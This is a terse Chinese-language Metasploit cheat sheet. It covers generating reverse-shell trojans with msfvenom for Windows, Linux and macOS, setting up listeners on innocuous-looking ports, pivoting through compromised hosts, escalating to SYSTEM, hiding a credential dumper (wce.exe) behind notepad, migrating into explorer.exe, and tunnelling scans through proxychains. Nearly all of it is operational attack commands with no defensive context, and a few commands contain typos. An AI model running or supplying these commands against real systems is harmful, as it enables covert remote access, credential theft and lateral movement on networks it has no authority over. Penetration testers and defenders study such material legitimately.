木马生成
Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=
MSF接收
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.128
set LPORT 8080(443等"正常"端口)
set ExitOnSession false
exploit -j -z
添加路由
shell -> ipconfig
run get_local_subnets
route list
backround -> route add 192.168.0.0 255.255.255.0 1
run autoroute -s 192.168.1.1/24
端口扫描
search portscan
use X
set rhost 192.168.1.1/24
set rport 445
set thread 10
提权
load priv
getsystem
use post/multi/recon/local_exploit_suggester
windows/local/service_permissions
......
BypassUAC
https://www.cnblogs.com/backlion/p/10552137.html
进程伪装
execute -H -m -d notepad.exe-f wce.exe -a -o wce.txt
上线自动进程迁移
set autorunscript migrate -n explorer.exe
set AutoRunScript migrate -f
Msf + proxychains
run autoroute -s 192.168.1.1/24
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvpotr 10080
exploit
修改proxychains
proxychains4 nmap -sT -Pn –open 192.168.100.1/22
注意:由于 proxychains 无法代理 icmp 的数据包 所以必须添加-Pn 参数 即不检测主机是否存活 直接进行端口 tcp 扫描
端口转发
portfwd add -l msf机器端口 -p 目标端口 -r 目标ip(127.0.0.1)
portfwd delete -l msf机器端口 -p 目标端口 -r 目标ip(127.0.0.1)
portfwd list
文件设置目标
set rhosts file:/root/ips.txt
乱码
chcp 65001